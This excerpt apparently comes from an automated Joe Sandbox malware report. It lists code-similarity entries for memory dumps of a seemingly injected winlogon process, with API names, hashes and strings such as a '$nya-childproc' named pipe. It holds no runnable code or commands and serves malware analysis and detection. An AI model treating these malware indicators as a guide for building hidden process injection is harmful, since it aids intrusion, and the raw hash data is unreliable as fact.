                                                  • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                  • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                  • API String ID: 740688525-1880043860
                                                  • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction ID: 841100cd2b18d10c7530346504741f059c760433718e5c958d51dca8c66ea59f
                                                  • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction Fuzzy Hash: 79518F33B4170851FA169B56A800BE57250BF48BB8FD88729AE3D073D4DF3AD54686C7
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Running Time
                                                  • API String ID: 1943346504-1805530042
                                                  • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                  • Instruction ID: 43c5e0d34ebc6dccf3a439a469952983112bd81c68c9bea665965f379fc87005
                                                  • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                  • Instruction Fuzzy Hash: A431A033E44B4896F722CF12E804B9AB3A0FBC8B9AF8505259E4957624DF39C45787C2
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Running Time
                                                  • API String ID: 1943346504-1805530042
                                                  • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                  • Instruction ID: 752b222f9f1cd9264d68c2c53bbe3c21249311e990f53d32d649b7497d1e9cf2
                                                  • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                  • Instruction Fuzzy Hash: 1A31E933E44B5896F722CF12A404B99B391FB88B98FC48528AD4843624DF3AD44383C6
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Running Time
                                                  • API String ID: 1943346504-1805530042
                                                  • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                  • Instruction ID: 5256ce4443abd153758bcd99e98d7bf0abd56920327f9ba419e77a24a63d0f90
                                                  • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                  • Instruction Fuzzy Hash: C231C433E40B4996F722CF12E804B99B3A0FB88FCAF840614AE4943665DF39C555C382
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                  • API String ID: 1943346504-3507739905
                                                  • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction ID: 5c16f09041be8b645f9990b675969fbfe91f0a43291d9b19f9330004a6e2f389
                                                  • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction Fuzzy Hash: 1C31A233A44B4986F712DF22A444B9A73A0FBC8F99F844024DE4A57724DE39D446C3C2
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                  • API String ID: 1943346504-3507739905
                                                  • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction ID: 01238701deea32749901f043c41a85233535f38141b80a811341c7053083115b
                                                  • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction Fuzzy Hash: 9D31B433A44B4996F712DF12A444B9973A1BF88F98F858129DE4A43724DF3AE44782C3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                  • API String ID: 1943346504-3507739905
                                                  • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction ID: 8eab24d6d6144954bd2ca5cd0d15ee39b50dab67e5137aa515f9043b1a9d6d94
                                                  • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction Fuzzy Hash: 07318433A50B4986F712DF12E854B9973E1BF84F9AF8440259E4A43724DF39D542C782
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
• Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
• Instruction ID: e25051ce7f45a5f54960e9841c87e8732a799f56ae8f5b22f7c45591229d7051
• Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
• Instruction Fuzzy Hash: CCD1CE33A447888AFB62CF2495407DD37A4FB4979DF901105EA8967B99CB35C482C7C3
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
• Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
• Instruction ID: 93558ce561f458a496548046fa9771a477e4b847544d87466bd0439cd31ff69d
• Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
• Instruction Fuzzy Hash: B2D1AC33A447888AFB62CB659540BDD77A0FB4578CF908119EA8957B96CB36C482C7C3
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
• Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
• Instruction ID: 9fc1314c1b3568874932ff714da4d78103fade56a62ede063e1102c62ff8e334
• Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
• Instruction Fuzzy Hash: E8D18B73A447888AFB22DF659540BDD7BA0FB4979DF900205EE8957B96CB35C480C783
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000003.1645690785.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_3_1ca7d1b0000_winlogon.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
• Instruction ID: db454895896c66f2aae9d4fb35f949d79ab27abdbeef052a67be09c4d4be01c7
• Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
• Instruction Fuzzy Hash: E8D17C33A44B488AFB629F65D480BED77A0FB45B8CF900115EA8D57B96DB35C082C783
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
• Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
Similarity
• API ID: Heap$Process$AllocEnumFreeInfoQueryValue
• String ID: d
• API String ID: 3743429067-2564639436
• Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
• Instruction ID: 2003d48ef077ee33f5376efef2558062a00fd4140dc90c64e07b1c00940d858d
• Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
• Instruction Fuzzy Hash: 6541B133614B84DAF761CF22E44479E77A1F788B89F808119DA890B758DF3DC44ACB92
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
• Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
Similarity
• API ID: Heap$Process$AllocEnumFreeInfoQueryValue
• String ID: d
• API String ID: 3743429067-2564639436
• Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
• Instruction ID: 8a4b5a10e027ae3e9ee44e0ca111a6274b15f8be53a4c776a450907aef51b4fb
• Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
• Instruction Fuzzy Hash: 9A41A133614B88C6F761CF21E44479EB7A1F788B98F848119EA8907758DF3ED446CB92
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
• Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
Similarity
• API ID: Heap$Process$AllocEnumFreeInfoQueryValue
• String ID: d
• API String ID: 3743429067-2564639436
• Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
• Instruction ID: 6f63e4c53f789b41bcef94283b1f03cc38c3850ef35568dd7831dedf23a81aa2
• Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
• Instruction Fuzzy Hash: 9A41D073614B84CAF761CF21E404B9E77A1F788B89F808129DA8947758DF39C585CB82
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
• Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
Similarity
• API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
• String ID: \\.\pipe\$nya-childproc
• API String ID: 166002920-3933612297
• Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
• Instruction ID: b17e47fd4f1449c8d4acc04e3621050a468f068c5ba762e4a054dfaa74389b3f
• Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
• Instruction Fuzzy Hash: BA116D32A18B5482F7118B21F41479B7760FB88BA8F944215EA5906AA8DF3DC146CBC2
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
• Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
Similarity
• API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
• String ID: \\.\pipe\$nya-childproc
• API String ID: 166002920-3933612297
• Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
• Instruction ID: 4ae2b1dd0165a769ae8a6f1806b14cc66bc568eb7fc37f487b2a6e2550b0d5b4
• Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
• Instruction Fuzzy Hash: 6D117F32A18B4482F7118B21F854B997760FB88BD8FD44314EA5906AA8CF3DC146CBC6
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
• Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
Similarity
• API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
• String ID: \\.\pipe\$nya-childproc
• API String ID: 166002920-3933612297
• Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
• Instruction ID: 60ccf5d49717dcd0a93c838fa48479b51da98688de155bc44fd090f9c66e7f12
• Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
• Instruction Fuzzy Hash: 0E117C32A15B4482F7118B21F464B9A7760FB88BD8F940314EA5942AA8DF3DC145CB86
APIs
Memory Dump Source
• Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
• Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
• Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
• Instruction ID: c017a9effcea72d85198735e9016d59a6dfb2979d59511daea1fd325c26afa1d
• Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
• Instruction Fuzzy Hash: BF81D373E8034846FA53AB659441FD97290BF8578EFC840259A8877396DB3BC84787C3
APIs
Memory Dump Source
• Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
• Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
• Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
• Instruction ID: 2ef598056096b3bfdeabdf0bab39421e006454b166941b32e9cc3945e4c11726
• Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
• Instruction Fuzzy Hash: AB817133E8034C96FA52AB659481BD97291BFC578CFD4C02DA98947796DB3BC84782C3
APIs
Memory Dump Source
• Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
• Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
• Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
• Instruction ID: 160e4b4da880ada073ff2f6592a37a3a82ede2845789ae4f7ceb2b1831bb5f15
• Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
• Instruction Fuzzy Hash: 4581E533E8034D46FA53AB659441FE97291BF8578EFC44114A98947796EB3BC846C3C3
APIs
Memory Dump Source
• Source File: 0000000F.00000003.1645690785.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_3_1ca7d1b0000_winlogon.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
• Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
• Instruction ID: 24616cbd0e12550494a136588df692ffe9cf0816aba21efa28764c3b263d334b
• Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
• Instruction Fuzzy Hash: 8881CF73F8434C46FA53AB6D9841BD93291BF8678CFD45025998C47396DA3BC882C783
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,?,?,000001CA7D299C6B,?,?,?,000001CA7D29945C,?,?,?,?,000001CA7D298F65), ref: 000001CA7D299B31
                                                  • GetLastError.KERNEL32(?,?,?,000001CA7D299C6B,?,?,?,000001CA7D29945C,?,?,?,?,000001CA7D298F65), ref: 000001CA7D299B3F
                                                  • LoadLibraryExW.KERNEL32(?,?,?,000001CA7D299C6B,?,?,?,000001CA7D29945C,?,?,?,?,000001CA7D298F65), ref: 000001CA7D299B69
                                                  • FreeLibrary.KERNEL32(?,?,?,000001CA7D299C6B,?,?,?,000001CA7D29945C,?,?,?,?,000001CA7D298F65), ref: 000001CA7D299BD7
                                                  • GetProcAddress.KERNEL32(?,?,?,000001CA7D299C6B,?,?,?,000001CA7D29945C,?,?,?,?,000001CA7D298F65), ref: 000001CA7D299BE3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
